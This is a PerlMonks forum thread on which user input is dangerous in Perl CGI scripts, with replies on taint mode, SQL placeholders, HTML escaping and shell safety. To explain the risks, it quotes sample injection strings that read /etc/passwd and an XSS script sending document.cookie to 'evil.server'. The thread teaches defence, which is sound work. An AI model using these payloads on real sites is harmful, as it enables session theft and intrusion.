PerlMonks  

Back to acceptable untainted characters

by bradcathey (Prior)
on Sep 07, 2003 at 02:03 UTC

bradcathey has asked for the wisdom of the Perl Monks concerning the following question:

Confession: I asked a similar question back in July, but I have just read Ovid's (ovid) "homily" on CGI and Perl, and besides being racked with guilt (for not writing scripts with -T--but I'm changing all that), I'd like to get more clarity.

(I have been running client-side validation via an external .js file, but I read somewhere that's a bad idea. Comments?)

I do not know the mind or methods of the "cracker," but I want to know if there are any characters that I should absolutely not let through because of the havoc they can potentially wreak.

My applications are HTML forms whose data is parsed and either sent in an e-mail or inserted into a MySQL db for later display via HTML::Template.

I would like to allow my users to write using normal punctuation (I've gotten complaints that I was too restrictive by not allowing !:?, etc.). So, can I allow any character and not cause a security problem?

BTW, do these very nodes get checked for bad stuff, and if so, what won't the superior monks let through?

Thanks in advance for further clarifying this concept that I'm having a hard time getting my head around.


Replies are listed 'Best First'.
Re: Back to acceptable untainted characters
by sgifford (Prior) on Sep 07, 2003 at 03:50 UTC

    Characters aren't dangerous to your Perl program in themselves. Passing them along to something else that may interpret them specially is what's dangerous. And knowing how the components you interact with will interpret the characters is the key to security (at least from this class of problems).

    For example:

    • If you're taking user input and using it in eval, well, you should probably find another way of doing what you're doing. But let's pretend there's some reason you have to, as an illustration. You could write something like this:
      eval "print OUT '$unsafe_input' or die";
      This isn't safe; we can see this by thinking about how Perl will interpret the user's input. Well, inside a string, a variable identifier will be interpreted, which might give away secret information (think $unsafe_input="',\$DATABASE_PASSWORD,'"), so the this-is-a-variable characters are unsafe---$@%. Also, escaping from that quoted string would be a real problem (think $unsafe_input="'; system('cat /etc/passwd'); print '"), so single-quotes are dangerous.
    • As you mentioned, if you're using MySQL, single-quotes are dangerous.
    • To the shell, shell metacharacters are dangerous, so you have to be particularly careful of $;*&|?.
    • If you're printing the user's input to a Web page, you'd better make sure it doesn't have HTML tags in it, or else your Web site will be vulnerable to a Cross-Site Scripting attack. So you'd better block or escape the characters that create HTML tags, such as < and >. Taint mode doesn't catch this one.
    • If you're using a user's input to drive a network protocol, say SMTP, you have to be careful of single dots on a line by themselves, since a lone dot ends the message data and whatever follows is read as commands. If you're taking the body of a message, for example, and sending it over SMTP, they could enter into their body ".\r\nMAIL FROM:<somebody_else>\r\nRCPT TO:<victim>\r\nDATA\r\n..." to leave the message they were sending, and create their own, perhaps to spam.
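
    A minimal sketch of the usual defence for the SMTP case, assuming you are writing the message data to the server yourself rather than going through a mail module. SMTP's transparency rule (RFC 5321) has the sender prepend one extra dot to any body line that starts with a dot, so a lone "." in user text can no longer end the message. The sub name dot_stuff is made up for this illustration.

```perl
use strict;
use warnings;

# Hypothetical helper: prepare user-supplied body text for the SMTP DATA phase.
sub dot_stuff {
    my ($body) = @_;

    # Normalise every line ending (CRLF, bare CR, bare LF) to CRLF.
    $body =~ s/\r\n|\r|\n/\r\n/g;

    # Prepend a dot to every line that begins with a dot, so the server
    # never sees a line consisting of a single "." inside the body.
    $body =~ s/^\./../mg;

    return $body;
}
```

    The receiving server strips the extra dot again, so the recipient sees the text exactly as the user typed it.
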
    Once you know what sorts of characters are unsafe, you need to stop them from being interpreted by the program you're interacting with. The two ways to do that are to disallow them, or escape them. Escaping is usually riskier because it's easier to make a mistake. For example, let's say you're trying to fix a double-quoted version of that eval with $user_input =~ s/(["\@\$%])/\\$1/g;. Well, what if $user_input='\"; cat /etc/passwd; print \"rest'? Your RE replaces each " character with \", so the \" becomes \\"---an escaped backslash, and an unescaped quote. Yikes! The solution is to also escape the backslash. Now \" turns into \\\", which is an escaped backslash followed by an escaped quote.
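
    To make the backslash point concrete, here is a small sketch of an escaping routine for text that will end up inside a double-quoted Perl string. It is only an illustration of the paragraph above, not a recommendation to eval user input; the sub name escape_for_dq is invented here.

```perl
use strict;
use warnings;

# Hypothetical helper: escape text for use inside a double-quoted Perl string.
# The backslash is part of the character class, so an attacker cannot use a
# backslash of their own to cancel the one we add.
sub escape_for_dq {
    my ($text) = @_;
    $text =~ s/([\\"\$\@%])/\\$1/g;
    return $text;
}
```

    With this version the two-character input \" comes out as \\\" (an escaped backslash followed by an escaped quote), which is the result described above.
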

    The other option is to disallow them altogether. This is safer, since it's easier to do this correctly, but it can be restrictive. If you're asking a user to enter a passage from a book, it may not be acceptable to disallow quotation marks. If you're asking a user for a password, you shouldn't reject any characters.

    The final thing to keep in mind is that when you're restricting characters, it's safer to list the characters you know are safe than the ones you know aren't. That way if you make a mistake, you've erred on the side of caution.
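
    A minimal sketch of that "list what is safe" approach, assuming a username-style field. The permitted character set, the 32-character limit, and the sub name clean_username are all assumptions for illustration; pick whatever set suits the place the value is going.

```perl
use strict;
use warnings;

# Hypothetical validator: return the value if it consists only of characters
# we have decided are safe, otherwise return undef.
sub clean_username {
    my ($input) = @_;
    return undef unless defined $input;

    # \A and \z anchor the whole string, so a trailing newline is rejected too.
    # Returning the captured $1 is also the idiom that untaints under -T.
    return $input =~ /\A([A-Za-z0-9_.-]{1,32})\z/ ? $1 : undef;
}
```

    Anything not named in the character class is refused, so a character you forgot to think about fails closed instead of slipping through.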

    Taint mode is designed to help you do this, but it only works when it knows which input sources are unsafe, which interactions are unsafe, and when you tell it how to make user input safe for use. You should be using taint mode, but only as a tool for catching you when you make a mistake, not as a primary line of defense.

    Whenever you're interacting with some system that a user can't normally interact with (a database you're authenticated to, a shell on a public Web server), think hard about what an attacker could do to make a mess of things, and then prevent it. Try a few things, and see how they're handled. Getting a particularly devious friend or co-worker to think of ways to subvert your system can be effective.

    A final note is that some modules can provide extra information to taint, such as telling DBI to treat all queries as an interaction that requires taint checking, or telling CGI that its output should be taint checked. I don't recall the names of these modules, but CPAN should be able to find them.

    Update: Fixed eval example near top so it's actually insecure.

      sgifford, would you or someone mind explaining this in greater detail:

      If you're printing the user's input to a Web page, you'd better make sure it doesn't have HTML tags in it, or else your Web site will be vulnerable to a Cross-Site Scripting attack. So you'd better block or escape the characters that create HTML tags, such as < and >. Taint mode doesn't catch this one.

      Currently, using HTML::Template, I'm doing stuff like this with data from my db:
      my $html = "<b>Signed up:</b>\n <table><tr><td>$data</td></tr> </table>\n";
      $template->param(html => $html);
      Cool or not?

      Thanks

        Barring security issues:
        Well, you can do it that way ... or you could set up a "widget" called signed_up.tmpl:
        <b>Signed up:</b> <table><tr><td><tmpl_var data></td></tr> </table>
        Include that in the main page:
        <tmpl_include signed_up.tmpl>
        And just make sure that the HTML::Template object responsible for populating the main page handles that <tmpl_var data> tag. I discuss this technique more at 3Re: HTML::Template - complex sites. Feel free to play with the code I have posted there.

        Now then, as for security ... if you don't want to allow your users to submit HTML, the easiest hack you can do is:

        my $data = '<html>evil tags!!</html>'; $data =~ s/</&lt;/g;
        This will convert all < characters to &lt; which will effectively keep the tag from rendering.

        jeffa

        L-LL-L--L-LL-L--L-LL-L--
        -R--R-RR-R--R-RR-R--R-RR
        B--B--B--B--B--B--B--B--
        H---H---H---H---H---H---
        (the triplet paradiddle with high-hat)
        
        For my web site, I wrote a Perl module that cleans up user-submitted HTML by only allowing sanctioned HTML tags to pass through. So, you can allow <P> and <b> but not anything else if you wanted.

        I intended to submit it to cpan, but never had the time. Anyway, you can download it here: HTMLCleaner.pm. It's got pod documentation. And if anyone wants to develop it, they are free to do so.

        It depends on whether $data is under the user's control or not.

        If it is, it's best to prevent all HTML. I usually use an HTML escaping module, like the escapeHTML function provided by CGI.

        Otherwise, if a malicious user can trick a legitimate user into setting $data to some Javascript code, the malicious user can steal cookies for your domain, or any other information in the page or the form.

      Thanks much graff and sgifford for your in-depth replies. I think I'll have to print them out and study them closely. Great stuff.

      I look forward to the day when I can be as helpful to some other fledgling coder.

      eval 'print OUT "$unsafe_input" or die';

      I do not think this is going to do what you said it does. Variables are not interpolated inside 'single quotes', so the eval only interpolates the variable one time. So, even if $unsafe_input='$DATABASE_PASSWORD', the password would not be printed.

      On the other hand, it would print the password if the code was like this: eval "print OUT \"$unsafe_input\" or die";

Re: Back to acceptable untainted characters
by graff (Chancellor) on Sep 07, 2003 at 03:34 UTC
    I have been running client-side validation via an external .js file, but I read somewhere that's a bad idea.

    The main problem would be that people can set their browsers to ignore javascript, which means that your client-side validation does not execute, and anything goes.

    My applications are HTML forms whose data is parsed and either sent in an e-mail or inserted into a MySQL db for later display via HTML::Template.

    Here, it's not so much a question of what users type, but rather how you handle the data they send you. There are "safe" and "unsafe" methods of sending emails and inserting/updating database content.

    In general terms, the difference is that the unsafe methods involve passing the user-supplied text to a process (a shell, mailer or db engine) as part of a single command or instruction string, so that the process will have the "opportunity" to parse, evaluate and try to execute the user-supplied string; usually the bad things that happen are innocent "mistakes" -- the user includes one or more of: single-quote, semi-colon, new-line, parentheses and/or other brackets, etc, which end up being "meaningful" to the process in unintended ways and cause the process to fail. But worst case would be someone who actually guesses the vulnerability and provides a parsable, executable and malicious string.

    Safe methods, in contrast, run the mailer, shell or db engine with discrete arguments/parameters/strings. Instructions to the process (insert/update, email address, or whatever) are provided separately from user-supplied text ("free-form data entry"), and this latter stuff is therefore passed straight through (into the db, mail message or whatever) without trying to do further interpretation of its content, which is exactly what you want.

    So in the case of passing content to MySQL, just make sure the SQL statement is prepared using the "?" placeholders for values to be searched for or written into the table, and pass the user-supplied text to DBI's execute method -- no worries about quote characters or anything when you do it this way.
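
    A minimal sketch of the placeholder approach, assuming $dbh is a handle already obtained from DBI->connect. The table signups, its columns name and comment, and the sub name insert_signup are made up for this example; prepare and execute are the standard DBI calls.

```perl
use strict;
use warnings;

# Hypothetical helper: store one form submission.
# $dbh is assumed to come from something like
#   DBI->connect($dsn, $user, $password, { RaiseError => 1 });
sub insert_signup {
    my ($dbh, $name, $comment) = @_;

    # The SQL text is a constant. User data never becomes part of it.
    my $sth = $dbh->prepare(
        'INSERT INTO signups (name, comment) VALUES (?, ?)'
    );

    # Values travel separately as bind parameters, one per "?", so quote
    # characters in them are stored as data and not parsed as SQL.
    return $sth->execute($name, $comment);
}
```

    Because the statement and the values are handed over separately, a name such as O'Brien needs no special handling at all.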

    I'm less conversant with mailer modules, but I think Mail::Mailer is a reasonably good tool that allows you to control how the mail header is assembled, and to supply the message body (user-supplied text) as a separate scalar value, keeping it safely away from any sort of executable context; search for "Mail" on the CPAN for a wide range of alternatives and supplements. (You might still want to "filter" user-supplied content, to watch out for things that look like base64-encoded virus attachments or whatever, but in your case, this is probably not really a thing to worry about.)

    Trying to do shell operations based on user input is a rarer and trickier thing -- in general, this is not done, unless with a very limited scope; e.g. the CGI script itself has a limited set of specific shell operations it is able to perform, based on, say, filenames or other information present on the server, and user input is used only to decide which if any of the allowed/possible operations to do.

Re: Back to acceptable untainted characters
by Anonymous Monk on Sep 07, 2003 at 02:21 UTC
    There are no dangerous characters. You've managed to miss the point of not trusting user input, which is don't do dangerous things with user input, and if you do, be very careful (i.e., don't trust it). If you're storing text users submit via a form, let them submit whatever they want, but don't try to eval it.
      Ahhh, so it's ME I need to watch, and not so much the user? Good point. Thanks. BTW, I am escaping the single ' for MySQL use, for obvious reasons.
      I have to disagree.

      For the integrity of your own server, you are (I believe) correct. But if someone evil submits code that breaks into the browser of whoever is reading the text, the one with the compromised system will not be pleased (s)he used your solution.

      So, please strip scripts as a bare minimum.

Re: Back to acceptable untainted characters
by dtr (Scribe) on Sep 07, 2003 at 13:40 UTC

    Just to add my £0.02 to the excellent points raised already in this post, the other big issue you'll have when writing HTML from CGIs is avoiding Cross Site Scripting attacks (XSS).

    Basically, most sites require users to log in via a form, and they then get given a cookie containing some form of session-id or authenticator, which allows the site to verify that they have successfully authenticated from then on.

    So, if someone inserts some code like

    <script language="JavaScript"> document.write("<img src='http://evil.server/" + document.cookie + ".jpg'>"); </script>
    into one of your forms, and this gets rendered onto a page, then anyone who looks at this page on the site will download the image from evil.server, and give evil.server their cookie. The server can then be configured to, for example, do an HTTP request to the password changing page and assign you a new password, or anything else that the site allows.

    Your best bet when displaying HTML is to taint anything from the database that could contain a string (see the Taint module on CPAN, or use the TaintOut => 1 argument to DBI->connect to taint everything you read from the database automatically). This prevents you from accidentally forgetting to escape a string you meant to. Then, set up a regex to replace ' with &#39;, < with &lt;, and so on. This will prevent such nasties from actually running.
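
    A minimal sketch of the "replace ' with &#39;, < with &lt;, and so on" step, using core Perl only. The sub name escape_html and the exact set of five characters are choices made for this illustration; a maintained escaping module does the same job.

```perl
use strict;
use warnings;

# Characters that can open a tag, close an attribute value, or start an entity.
my %ENTITY_FOR = (
    '&' => '&amp;',
    '<' => '&lt;',
    '>' => '&gt;',
    '"' => '&quot;',
    "'" => '&#39;',
);

# Hypothetical helper: make untrusted text safe to print inside an HTML page.
sub escape_html {
    my ($text) = @_;
    # One pass over the string, so an "&" produced by a replacement is
    # never escaped a second time.
    $text =~ s/([&<>"'])/$ENTITY_FOR{$1}/g;
    return $text;
}
```

    Run it on every untrusted value at the point where it is written into the page, so the script tag in the example above is displayed as text and never executed.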

      use the TaintOut => 1 argument to DBI->connect

      ++ Very cool thing that is, indeed. Put that in my dbconn subroutine, plus what I already have in my input-getting function, and I don't have to worry so much about forgetting to mark something as tainted.

      I still have to remember to encode entities on untrusted data going to the browser, though.


      $;=sub{$/};@;=map{my($a,$b)=($_,$;);$;=sub{$a.$b->()}} split//,".rekcah lreP rehtona tsuJ";$\=$ ;->();print$/
Re: Back to acceptable untainted characters
by zakzebrowski (Curate) on Sep 07, 2003 at 14:29 UTC
    Why not just take the user's input for the password, and then generate an MD5 digest or similar from Perl? That way, regardless of what they type in (which can contain as many special characters as they like), you will be sending the database alphanumeric characters only (if you choose the hex digest option).
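
    A minimal sketch of that suggestion, using MD5 only because it is the digest named above. Digest::MD5 ships with Perl; the sub name password_digest is made up for this example.

```perl
use strict;
use warnings;
use Digest::MD5 qw(md5_hex);

# Hypothetical helper: turn whatever the user typed into 32 hex characters.
sub password_digest {
    my ($password) = @_;

    # md5_hex works on bytes, so encode our private copy as UTF-8 first.
    # This keeps it from dying on characters above 0xFF.
    utf8::encode($password);

    return md5_hex($password);
}
```

    Whatever punctuation the password contains, the value handed to the database contains only the characters 0-9 and a-f.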

    ----
    Zak
Re: Back to acceptable untainted characters
by bradcathey (Prior) on Sep 08, 2003 at 01:17 UTC
    Thanks all. I think I'm getting the gist. But let me summarize what I've read on this thread (knowing there's lots more elsewhere):

    0. It's not necessarily what the user enters, but what I do with it

    1. Don't trust user input, so use -T

    2. RegExp data from user form to untaint, but RegExps can vary depending on what I want to allow them to enter

    3. In all cases, RegExp/escape any HTML from users so the code would never render in a browser

    4. Stay away from shells and evals (this should be no problem, 'cause I don't know enough to even know why I'd want to use one), but also file ops that use user input

    5. Use placeholders in MySQL inserts

    6. Use modules where I can find them to help

    Sorry if I was flogging the proverbial dead horse, but you can see what a little paranoia can do!

    Thanks again.

    P.S. Just read Gunther Birznieks' excellent article CGI/Perl Taint Mode FAQ
      3. In all cases, RegExp/escape any HTML from users so the code would never render in a browser
      ...unless you want some HTML to render, as you might in e.g. a user "biography" field. In that case, you'll probably want to do some trickery with an HTML parser module to allow a few tags and attributes and strip out the rest.

      Once again, though, note the use of "allow". Decide what's permissible and take out everything else. Better safe than sorry.

      =cut
      --Brent Dax
      There is no sig.

        Thanks BrentDax. That was a helpful word.

      4. Stay away from shells and evals (this should be no problem, 'cause I don't know enough to even know why I'd want to use one), but also file ops that use user input

      Some people are more comfortable using the shell than they are with Perl, so they might choose to write
      system("rm $filename");
      instead of using unlink. This would be a problem if $filename were a string beginning with a semicolon followed by another shell command. Taint mode will not allow system to execute when given tainted input, to prevent that type of thing from happening.
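
      A minimal sketch of the unlink alternative, assuming uploaded files live in one directory and have simple names. The sub name remove_upload and the permitted file name pattern are assumptions for illustration.

```perl
use strict;
use warnings;
use File::Spec;

# Hypothetical helper: delete one file from a fixed directory without a shell.
sub remove_upload {
    my ($dir, $name) = @_;

    # Accept plain file names only: no slashes, no leading dot, no shell
    # metacharacters. The capture also untaints the name under -T.
    return 0
        unless defined $name
            && $name =~ /\A([A-Za-z0-9_][A-Za-z0-9_.-]*)\z/;

    my $path = File::Spec->catfile($dir, $1);

    # unlink goes straight to the operating system; no shell ever parses $path.
    return unlink($path) ? 1 : 0;
}
```

      If an external command really is needed, the list form system('rm', '--', $path) also bypasses the shell, because each argument is passed to the program as-is.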

Re: Back to acceptable untainted characters
by jonadab (Parson) on Sep 08, 2003 at 14:37 UTC

    Don't untaint all your data. That defeats the purpose of running in taint mode. Leave the data tainted, unless taint mode stops you from doing something you need to do, and then just untaint (carefully) the ones you need to use that way. In fact, if you use a regex to parse fields out of something, you should mark the extracted fields as tainted unless your regex was carefully constructed to make sure they're safe. The whole point of Taint mode is to alert you when you're doing something potentially unsafe. At that point, you want to check the datum you're doing it with specifically in terms of the operation you're performing, to make it safe for that. For example, if you're doing a system call that will be interpreted by a shell, you want to strip shell metacharacters. But you don't need to strip shell metacharacters when you send an email.

    MySQL can store anything safely, if you use ? and pass in the value in the execute() call. However, you need to think about what you're going to do with the data when they come out of MySQL. If you don't check them before you put them in, you should mark them as tainted when you take them out.

    As far as content going to the browser: decide whether it's plain text or HTML. If it's text, just encode the entities and have done. This is easy (there is a module for it on CPAN) and as safe as is necessary for ordinary purposes. If it's HTML, you'll want to check it for certain dangerous things, like scripts, and personally I also like to minimally parse it (basically just check for wellformedness), and if it's not wellformed revert to treating it like plain text (i.e., encode entities). This will annoy people who like to write old-style HTML with <p> tags between (instead of around) paragraphs, but it will also prevent any number of easy-to-make stupid mistakes, like forgetting to close off a table (which causes huge problems for older browsers).

    For email: if you're sending as text/plain, which you should be, I wouldn't worry about it too much. There are tricks that can be played to make Outlook think something is an attachment even though the headers don't say so, but people who use Outlook are going to get viruses regularly anyway, so don't sweat it.


    $;=sub{$/};@;=map{my($a,$b)=($_,$;);$;=sub{$a.$b->()}} split//,".rekcah lreP rehtona tsuJ";$\=$ ;->();print$/

      In fact, if you use a regex to parse fields out of something, you should mark the extracted fields as tainted unless your regex was carefully constructed to make sure they're safe.

      How does one mark a variable as tainted? I did not realize the program had any way to control it directly.

        How does one mark a variable as tainted?
        use Taint (); Taint::taint($untrustedvalue);

        For example, if you use a regex to parse the key-value fields out of a query string and reverse the CGI encoding, you should mark the resulting data as tainted. (The "use CGI or die" advocates will tell you that you shouldn't be writing your own function for that anyway, but that's another debate for another thread.)


        $;=sub{$/};@;=map{my($a,$b)=($_,$;);$;=sub{$a.$b->()}} split//,".rekcah lreP rehtona tsuJ";$\=$ ;->();print$/
Re: client-side scripts
by TomDLux (Vicar) on Sep 08, 2003 at 23:32 UTC

    Client-side scripts are not effective for security ... they prevent innocent bystanders from attacking you, but malevolent people will side-step your scripts. They resemble a locked front door with a wide open window right next to it.

    However, client-side scripts are useful for things like verifying user input. The scripts can irritate users, especially if poorly written, but submitting a form-full of defective data to the server is worse.

    --
    TTTATCGGTCGTTATATAGATGTTTGCA

Node Type: perlquestion [id://289525]
Approved by PodMaster
Front-paged by jonnyfolk